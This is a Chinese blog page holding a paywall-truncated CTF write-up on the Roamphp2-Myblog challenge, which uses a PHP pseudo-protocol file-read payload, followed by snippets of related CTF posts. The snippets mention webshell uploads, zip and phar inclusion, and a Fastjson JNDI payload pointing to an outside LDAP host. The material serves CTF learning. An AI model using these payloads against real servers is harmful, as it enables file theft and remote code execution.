[极客大挑战 2020]Roamphp2-Myblog - 伪协议+文件上传+(LFI&ZIP)||(LFI&Phar)【***】

已于 2023-10-09 21:25:31 修改
阅读量370 收藏
点赞数
文章标签: web安全 安全 ctf 文件上传 LFI Phar 伪协议
于 2023-10-09 21:18:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oZuoShen123/article/details/133694884
版权

[极客大挑战 2020]Roamphp2-Myblog

1

1 解题流程

1.1 分析

1、点击login,进入登录界面,用户名在首页提示了是longlone,密码未知,无法登录。
2、点击其他地方,发现没有什么线索,唯一有的只有page这个参数。
3、题目描述:Do you know the PHP pseudo-protocol? —— 意思就是跟伪协议有关系

1.2 解题

  1. 首先,我们通过page,看看是否能读取到源码
    ?page=php://filter/read=convert.base64-encode/resource=login
    得到以下关键代码
    <form method="post" action="/?page=admin/user" class=
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Hillain
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
[挑战 2020]Roamphp2-Myblog
m0_64348326的博客
09-04 219
3.进入后台上面读取到的文件代码就重要了,它采取了白名单的方式只允许图片后缀上,但是要访问压缩包里面的木马文件,还需要使用。木马文件,不用加后缀,因为它会自动加。文件,并从中读取序列化数据的。1.进入到界面,url主界面一个很明显的文件包含,直接用。,因为可以猜测到它的文件包含页面逻辑会给所有文件名都加上。,明显密码和登录界面说的一样,获取不了。协议的用法,因为想到了,无论文件是什么后缀,名给删除,php就找不到密码数据了,也就是。6.上成功,访问即可执行命令,,上的时候再访问压缩包内的。
[挑战 2020]
qq_62046696的博客
09-18 528
可以看到,他设置了白名单,但我想一句话木马上去,而且上成功的话他会告诉你上的路径,然后再用之前可以的page参数可以解析协议的,但是并不确定是否可以php文件也会被解析,先不想那么多,做来看。坚定了我木马的决心,这里想到了将php文件打包成zip,改后缀名为jpg,再利用zip协议进行读取。整体看下来,要执行check过滤函数,我们就需要执行,waf的else部分,然后过滤掉了php、eval可以用PHP短标签进行绕过,比如。请求方式有误,比如应该用GET请求方式的资源,用了POST。
[挑战 2020]Greatphp
snowlyzz的博客
09-15 579
php 原生类的学习与姿势利用,
buu-day10
anwen12的博客
01-27 2172
0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 127.0.0.1 www.baidu.com www.google.com 2...
CNVD-2020-10487-Tomcat-Ajp-lfi_exp_
09-29
CNVD-2020-10487-Tomcat-Ajp-lfi
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1186
[挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程杯-简单的php
BUU刷题记录——7
weixin_43610673的博客
02-20 3382
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎杯 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不值得话就可以进入if语句,跟进_fo
[挑战 2019]Upload——php短标签
m0_46607055的博客
09-03 1529
目录 题目信息 核心知识点(一)——php短标签 核心知识点(二)——GIF89a图片头文件欺骗 核心知识点(三)——phtml 解题步骤 题目信息 尝试一句话木马后发现,文件内容不能有 <? ,后缀不能是php 核心知识点(一)——php短标签 php短标签 <? echo '123';?> #前提是开启配置参数short_open_tags=on <?=(表达式)?> 等价于 <?php echo (表达式)?> #不需要开启参.
2020第十一届挑战——Geek Challenge部分wp
monster663的博客
10-26 3994
比赛正在进行中,本来只剩web没有AK,然后出了一波新题,先留一个坑,之后再填
[BUUCTF0223][挑战 2020]Roamphp1-Welcome
m0_52674595的博客
12-24 453
[BUUCTF0223] [挑战 2020]Roamphp1-Welcome 打开靶机 什么都没 查看源码 什么也没有 猜想不是用GET请求 尝试用POST请求 使用火狐的插件:RESTClient 使用POST请求 查看预览 看到要求 $_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'] 即roam1与roam2不能相等 再看sha1()函数 查看得知sha1()
CTF Geek Challenge——第十一届挑战Web Write Up
无限迭代中......
11-18 1210
比赛时间:2020年10月17日早上9点 比赛时限:一个月 0x1Welcome sha1绕过、php文件包含、一句话木马 Postman发送POST请求 sha1绕过 0x2flagshop md5碰撞 0x3朋友的学妹 源代码泄露 Base64在线加密、解密工具:http://tool.chinaz.com/Tools/Base64.aspx 0x4EZwww 后台扫描 后台扫描 ...
BUUCTF--[挑战 2020]Roamphp1-Welcome
qq_46263951的博客
07-29 342
进入页面后一片空白,查看源码也啥也没有,蒙蔽中... 看大佬wp说有提示,直接改为post请求即可查看到一段代码 根据源码中的提示,如果我们想要获取更多的信息就要使下面的语句成立 if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){ 若想成立非常简单,因为sha1函数无法处理数组,所以令两个变量都为数组则得出的结果为false===false值为..
挑战2020年部分wp
qq_46041723的博客
11-17 1505
2020挑战部分wp前言web一、朋友的学妹二、EZWWW三、刘壮的黑页四、welcome 前言 2020挑战开始了。又是一届自闭季。在变菜的路上一去不复返 web 一、朋友的学妹 打开题目 发现提示,然后查看控制窗口发现 然后看到base64加密,解密后得到flag。 二、EZWWW 打开题目 发现提示网站已经备份,那么就直接御剑扫后台得到 然后打开zip路径得到下载提示,打开 直接放弃文档里的flag。肯定假的。所以打开index.php,发现 <html> <hea
[挑战 2019]RCE ME
SopRomeo的博客
04-19 1078
说明: 本篇大部分采用这篇博的思路 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("Thi...
[挑战 2020]Roamphp1-Welcome 请求方式不对
qq_54929891的博客
05-14 273
进入后我没仔细看,发现网页无法正常运行,以为没网了,后面仔细一看报错的状态是405 百度安全验证 原来是请求方式有问题,便抓包改一下请求方式 <?php error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allowed"); exit(); } else { if (!isset($_POST['roam1']) || !is..
Hashpump实现哈希长度扩展攻击 | [挑战]RCEME
crispr的博客
02-17 1908
Hashpump实现哈希长度扩展攻击 | RCEME 0x01 HASH长度拓展攻击 哈希长度拓展攻击的原理有点过于复杂了,这里直接copy其他大佬的描述了。 长度扩展攻击(length extension attack),是指针对某些允许包含额外信息的加密散列函数的攻击手段。对于满足以下条件的散列函数,都可以作为攻击对象: ① 加密前将待加密的明文按一定规则填充到固定长度(例如512或1024...
LFI to RCE
最新发布
10-19
LFI to RCE是指通过本来只能访问服务器上的文件的漏洞(LFI),进一步利用该漏洞实现远程代码执行(RCE)。一般情况下,LFI漏洞只能让攻击者读取服务器上的文件,但是如果攻击者能够找到一个包含可执行代码的文件,就可以通过LFI漏洞执行该代码,从而实现RCE攻击。攻击者可以通过访问服务器上的日志文件等方式获取到包含可执行代码的文件的路径,然后利用LFI漏洞执行该文件中的代码,从而实现RCE攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值